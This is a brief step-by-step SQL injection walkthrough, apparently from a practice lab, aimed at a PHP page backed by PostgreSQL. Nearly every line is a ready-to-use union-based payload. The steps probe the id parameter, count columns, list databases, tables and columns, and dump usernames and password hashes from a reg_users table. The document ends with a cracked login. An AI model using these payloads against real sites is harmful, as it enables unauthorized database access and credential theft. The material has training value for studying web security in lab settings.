Step 1: Test whether an injection point exists
new_list.php?id=1 and 1=2
Step 2: Use ORDER BY to determine the number of columns returned by the query
new_list.php?id=1 order by 4
new_list.php?id=1 order by 5
With order by 5 no data is echoed, while order by 4 still echoes data, so the backend returns 4 columns to the frontend.
Step 3: Find the echoed (displayed) columns
new_list.php?id=1 and 1=2 union select null,'null','null',null
Step 4: List the databases
new_list.php?id=1 and 1=2 union select null,null,string_agg(datname,'~'),null from pg_database
Step 5: List the table names in the database
new_list.php?id=1 and 1=2 union select null,null,string_agg(table_name,','),null from information_schema.tables where table_schema='public'
Step 6: List the column names of the reg_users table
new_list.php?id=1 and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
Step 7: Retrieve the usernames and passwords
new_list.php?id=1 and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
Step 8: Reverse the MD5 password hash (lookup/crack) and log in
name:mozhe1
password:785576